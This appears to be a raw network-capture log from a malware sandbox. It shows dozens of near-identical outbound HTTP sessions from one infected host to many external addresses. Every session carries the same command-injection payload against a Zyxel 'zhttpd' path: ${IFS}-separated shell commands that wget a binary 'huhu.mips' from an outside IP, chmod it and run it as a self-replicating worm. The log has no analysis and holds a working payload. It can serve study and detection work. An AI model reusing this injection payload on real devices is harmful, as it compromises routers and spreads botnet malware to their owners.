                                                        Feb 2, 2024 06:20:58.709619999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1775192.168.2.144974282.121.173.226443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.709650040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1776192.168.2.1435088137.71.117.86443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.709697962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1777192.168.2.1445246107.40.186.166443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.709738016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1778192.168.2.1445506142.7.36.118443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.709774971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1779192.168.2.144187863.126.14.52443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.709801912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1780192.168.2.1433764168.111.119.73443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.709857941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1781192.168.2.1450120204.91.95.19443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.709896088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1782192.168.2.1438896164.151.218.34443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.709930897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1783192.168.2.1435978183.243.95.90443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:58.709974051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1784192.168.2.1451002106.171.221.101443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.718714952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1785192.168.2.1438896136.244.125.96443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.718745947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1786192.168.2.1459834182.48.81.89443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.718780994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1787192.168.2.1450276135.108.172.66443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.718813896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1788192.168.2.1457732134.130.79.150443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.718853951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1789192.168.2.1456414122.91.119.52443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.718910933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1790192.168.2.1460860176.212.123.30443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.718947887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1791192.168.2.1452920139.11.168.125443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.718997002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1792192.168.2.1454820186.173.51.171443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.719028950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1793192.168.2.144869268.210.109.210443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.719075918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1794192.168.2.1459938169.99.110.35443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.719089985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1795192.168.2.1434038130.183.232.0443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.719120979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1796192.168.2.1439838149.61.230.175443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.719170094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1797192.168.2.1437788126.99.50.51443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.719202995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1798192.168.2.144640281.125.167.161443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.719227076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1799192.168.2.14449784.84.41.254443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.719268084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1800192.168.2.1433038137.12.226.76443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.719300032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1801192.168.2.1448082210.174.38.41443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.719335079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1802192.168.2.1445368183.140.31.134443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.719372988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1803192.168.2.143385639.197.68.184443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.719428062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1804192.168.2.145798684.246.194.242443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.719460011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1805192.168.2.1459060119.216.172.231443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.719491959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1806192.168.2.1446318194.212.245.247443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.719542980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1807192.168.2.143305858.204.88.234443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.719571114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1808192.168.2.1455026222.92.231.6443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.719620943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1809192.168.2.1444902223.227.103.249443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.719651937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1810192.168.2.143560248.158.140.5443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.719691038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1811192.168.2.146082297.221.101.96443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.719738960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1812192.168.2.1452350110.121.169.177443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.719769955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1813192.168.2.1448468135.161.192.105443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.719821930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1814192.168.2.1454918203.143.110.95443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.719849110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1815192.168.2.1452994107.5.55.134443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.719888926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1816192.168.2.1438008166.47.118.48443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.719923019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1817192.168.2.145420460.231.37.191443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.719952106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1818192.168.2.1442806210.159.21.29443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.719980001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1819192.168.2.145406283.30.83.238443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.720043898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1820192.168.2.1435210205.86.245.39443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.720077991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1821192.168.2.1436348209.168.130.183443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.720117092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1822192.168.2.1434836146.75.252.104443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.720159054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1823192.168.2.1445624200.249.7.127443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.720191002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1824192.168.2.1451154160.231.80.122443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.720241070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1825192.168.2.1454910138.156.188.177443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.720283985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1826192.168.2.1460924204.126.105.23443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.720324993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1827192.168.2.1460542220.163.64.63443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.720330000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1828192.168.2.145388038.178.29.224443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.720355034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1829192.168.2.145502023.92.62.179443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.720422983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1830192.168.2.143858048.67.10.132443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.720448971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1831192.168.2.1455406122.150.119.202443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.720469952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1832192.168.2.144075213.15.31.55443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.720515966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1833192.168.2.1458968206.172.215.223443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.720573902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1834192.168.2.144301490.120.117.220443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.720598936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1835192.168.2.1447422182.132.166.194443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.720630884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1836192.168.2.144291267.27.13.119443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.720674992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1837192.168.2.143283841.150.45.244443
                                                        TimestampBytes transferredDirectionData
